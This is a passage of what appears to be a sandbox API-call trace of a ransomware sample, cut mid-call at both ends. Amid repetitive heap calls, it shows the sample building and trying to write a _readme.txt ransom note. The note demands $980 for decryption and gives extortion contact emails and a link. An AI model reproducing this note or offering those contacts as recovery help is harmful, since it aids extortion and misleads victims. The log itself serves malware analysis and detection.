hHeap=0x6a0000) returned 1 [0174.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.791] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0174.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.791] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.791] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.791] PathFindFileNameW (pszPath="") returned="" [0174.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.791] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.792] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0174.792] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0174.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.792] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.792] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0174.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.792] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0174.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.793] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.793] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.793] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.795] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*" (normalized: "c:\\boot\\ja-jp\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.796] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.796] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.796] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.798] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.799] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.804] RtlAllocateHeap (HeapHandle=0x6a0000, 